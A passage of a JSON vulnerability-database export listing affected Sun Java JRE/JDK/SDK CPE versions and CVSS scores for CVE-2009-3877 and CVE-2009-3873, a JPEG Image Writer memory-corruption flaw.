"cpe:/a:sun:jre:1.3.1_6", "cpe:/a:sun:jre:1.4.2_8", "cpe:/a:sun:sdk:1.4.2_14", "cpe:/a:sun:sdk:1.4.2_04", "cpe:/a:sun:jre:1.3.1_03", "cpe:/a:sun:sdk:1.3.1_10", "cpe:/a:sun:jre:1.4.2_09", "cpe:/a:sun:sdk:1.3.1_8", "cpe:/a:sun:sdk:1.4.2_17", "cpe:/a:sun:sdk:1.3.1_12", "cpe:/a:sun:sdk:1.3.1_5", "cpe:/a:sun:jre:1.4.2_02", "cpe:/a:sun:jre:1.3.1_06", "cpe:/a:sun:jre:1.4.2_22", "cpe:/a:sun:sdk:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_21", "cpe:/a:sun:jre:1.3.1_18", "cpe:/a:sun:jre:1.3.1_3", "cpe:/a:sun:sdk:1.4.2_6", "cpe:/a:sun:jre:1.4.2_23", "cpe:/a:sun:jre:1.4.2_03", "cpe:/a:sun:jre:1.3.1_9", "cpe:/a:sun:jre:1.4.2_07", "cpe:/a:sun:jre:1.3.1_19", "cpe:/a:sun:jre:1.3.1_5", "cpe:/a:sun:jre:1.3.1_09", "cpe:/a:sun:sdk:1.4.2_18", "cpe:/a:sun:sdk:1.4.2_5", "cpe:/a:sun:jre:1.3.1_17", "cpe:/a:sun:jre:1.4.2_2", "cpe:/a:sun:sdk:1.4.2_1", "cpe:/a:sun:jre:1.3.1_01", "cpe:/a:sun:sdk:1.4.2_3", "cpe:/a:sun:jre:1.3.1_25", "cpe:/a:sun:jre:1.4.2_13", "cpe:/a:sun:sdk:1.3.1_07", "cpe:/a:sun:sdk:1.4.2_15"], "id": "CVE-2009-3877", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3877", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:sun:jre:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update11:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update13:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update5:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update15:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update16:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update9:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update11:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update9:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update21:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_24:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01a:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update3:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update21:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_25:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_24:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_01a:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update18:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update12:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update19:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update8:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update14:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update19:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update13:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_25:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update6:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update11_b03:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update6:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update7_b03:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update17:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update8:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update10:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update12:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update17:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update20:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update18:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update15:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update20:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:40:06", "description": "The JPEG Image Writer in Sun Java SE in JDK and JRE 5.0 before Update 22, JDK and JRE 6 before Update 17, and SDK and JRE 1.4.x before 1.4.2_24 allows remote attackers to gain privileges via a crafted image file, related to a \"quantization problem,\" aka Bug Id 6862968.", "edition": 6, "cvss3": {}, "published": "2009-11-05T16:30:00", "title": "CVE-2009-3873", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3873"], "modified": "2018-10-30T16:25:00", "cpe": ["cpe:/a:sun:sdk:1.3.1_15", "cpe:/a:sun:jre:1.4.2_4", "cpe:/a:sun:jre:1.4.2_21", "cpe:/a:sun:jre:1.3.1_8", "cpe:/a:sun:sdk:1.3.1_16", "cpe:/a:sun:jre:1.4.2_17", "cpe:/a:sun:sdk:1.3.1_13", "cpe:/a:sun:jre:1.3.1_7", "cpe:/a:sun:jre:1.4.2_7", "cpe:/a:sun:sdk:1.3.1_02", "cpe:/a:sun:jdk:1.6.0", "cpe:/a:sun:jre:1.4.2_10", "cpe:/a:sun:jre:1.4.2_9", "cpe:/a:sun:jre:1.4.2_19", "cpe:/a:sun:sdk:1.4.2_05", "cpe:/a:sun:jre:1.3.1_08", "cpe:/a:sun:sdk:1.3.1_19", "cpe:/a:sun:jre:1.3.1_23", "cpe:/a:sun:sdk:1.4.2_11", "cpe:/a:sun:jre:1.3.1_04", "cpe:/a:sun:sdk:1.3.1_3", "cpe:/a:sun:sdk:1.3.1_06", "cpe:/a:sun:jre:1.4.2_06", "cpe:/a:sun:jre:1.4.2_5", "cpe:/a:sun:sdk:1.4.2_4", "cpe:/a:sun:sdk:1.4.2_03", "cpe:/a:sun:jre:1.6.0", "cpe:/a:sun:jre:1.4.2_11", "cpe:/a:sun:jre:1.3.1_01a", "cpe:/a:sun:jre:1.4.2_12", "cpe:/a:sun:jre:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_19", "cpe:/a:sun:sdk:1.4.2_8", "cpe:/a:sun:sdk:1.3.1_20", "cpe:/a:sun:jre:1.3.1_14", "cpe:/a:sun:jre:1.4.2_01", "cpe:/a:sun:jre:1.4.2_14", "cpe:/a:sun:jre:1.4.2_18", "cpe:/a:sun:sdk:1.3.1_23", "cpe:/a:sun:sdk:1.3.1_21", "cpe:/a:sun:jre:1.3.1_07", "cpe:/a:sun:sdk:1.3.1_04", "cpe:/a:sun:jre:1.3.1_12", "cpe:/a:sun:jre:1.4.2_04", "cpe:/a:sun:sdk:1.4.2_06", "cpe:/a:sun:sdk:1.3.1_09", "cpe:/a:sun:jre:1.4.2_3", "cpe:/a:sun:jre:1.3.1_22", "cpe:/a:sun:sdk:1.4.2_01", "cpe:/a:sun:sdk:1.3.1_2", "cpe:/a:sun:jre:1.4.2_6", "cpe:/a:sun:sdk:1.4.2_9", "cpe:/a:sun:sdk:1.3.1_17", "cpe:/a:sun:sdk:1.3.1_24", "cpe:/a:sun:sdk:1.4.2_10", "cpe:/a:sun:sdk:1.4.2_12", "cpe:/a:sun:jre:1.3.1_1", "cpe:/a:sun:jre:1.3.1_21", "cpe:/a:sun:jre:1.3.1_15", "cpe:/a:sun:sdk:1.3.1_03", "cpe:/a:sun:sdk:1.3.1_6", "cpe:/a:sun:jre:1.3.1_02", "cpe:/a:sun:sdk:1.4.2_09", "cpe:/a:sun:sdk:1.3.1_01a", "cpe:/a:sun:sdk:1.3.1_11", "cpe:/a:sun:jre:1.4.2_1", "cpe:/a:sun:sdk:1.3.1_22", "cpe:/a:sun:sdk:1.4.2_07", "cpe:/a:sun:jdk:1.5.0", "cpe:/a:sun:sdk:1.3.1_9", "cpe:/a:sun:jre:1.5.0", "cpe:/a:sun:sdk:1.4.2_20", "cpe:/a:sun:sdk:1.3.1_05", "cpe:/a:sun:sdk:1.3.1_7", "cpe:/a:sun:jre:1.3.1_11", "cpe:/a:sun:jre:1.4.2_20", "cpe:/a:sun:jre:1.3.1_16", "cpe:/a:sun:jre:1.3.1_4", "cpe:/a:sun:sdk:1.4.2_7", "cpe:/a:sun:sdk:1.4.2_08", "cpe:/a:sun:jre:1.3.1_20", "cpe:/a:sun:jre:1.3.1_2", "cpe:/a:sun:sdk:1.4.2_22", "cpe:/a:sun:sdk:1.3.1_01", "cpe:/a:sun:jre:1.3.1_10", "cpe:/a:sun:sdk:1.3.1_18", "cpe:/a:sun:sdk:1.3.1_14", "cpe:/a:sun:jre:1.4.2_08", "cpe:/a:sun:sdk:1.3.1_4", "cpe:/a:sun:sdk:1.4.2_02", "cpe:/a:sun:sdk:1.4.2_13", "cpe:/a:sun:sdk:1.4.2_2", "cpe:/a:sun:sdk:1.3.1_08", "cpe:/a:sun:jre:1.3.1_24", "cpe:/a:sun:jre:1.3.1_13", "cpe:/a:sun:jre:1.3.1_05", "cpe:/a:sun:sdk:1.3.1_25", "cpe:/a:sun:jre:1.4.2_05", "cpe:/a:sun:jre:1.4.2_15", "cpe:/a:sun:jre:1.3.1_6", "cpe:/a:sun:jre:1.4.2_8", "cpe:/a:sun:sdk:1.4.2_14", "cpe:/a:sun:sdk:1.4.2_04", "cpe:/a:sun:jre:1.3.1_03", "cpe:/a:sun:sdk:1.3.1_10", "cpe:/a:sun:jre:1.4.2_09", "cpe:/a:sun:sdk:1.3.1_8", "cpe:/a:sun:sdk:1.4.2_17", "cpe:/a:sun:sdk:1.3.1_12", "cpe:/a:sun:sdk:1.3.1_5", "cpe:/a:sun:jre:1.4.2_02", "cpe:/a:sun:jre:1.3.1_06", "cpe:/a:sun:jre:1.4.2_22", "cpe:/a:sun:sdk:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_21", "cpe:/a:sun:jre:1.3.1_18", "cpe:/a:sun:jre:1.3.1_3", "cpe:/a:sun:sdk:1.4.2_6", "cpe:/a:sun:jre:1.4.2_03", "cpe:/a:sun:jre:1.3.1_9", "cpe:/a:sun:jre:1.4.2_07", "cpe:/a:sun:jre:1.3.1_19", "cpe:/a:sun:jre:1.3.1_5", "cpe:/a:sun:jre:1.3.1_09", "cpe:/a:sun:sdk:1.4.2_18", "cpe:/a:sun:sdk:1.4.2_5", "cpe:/a:sun:jre:1.3.1_17", "cpe:/a:sun:jre:1.4.2_2", "cpe:/a:sun:sdk:1.4.2_1", "cpe:/a:sun:jre:1.3.1_01", "cpe:/a:sun:sdk:1.4.2_3", "cpe:/a:sun:jre:1.3.1_25", "cpe:/a:sun:jre:1.4.2_13", "cpe:/a:sun:sdk:1.3.1_07", "cpe:/a:sun:sdk:1.4.2_15"], "id": "CVE-2009-3873", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3873", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:sun:jre:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_21:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_20:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_19:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_7:*:*:*:*:*:*", 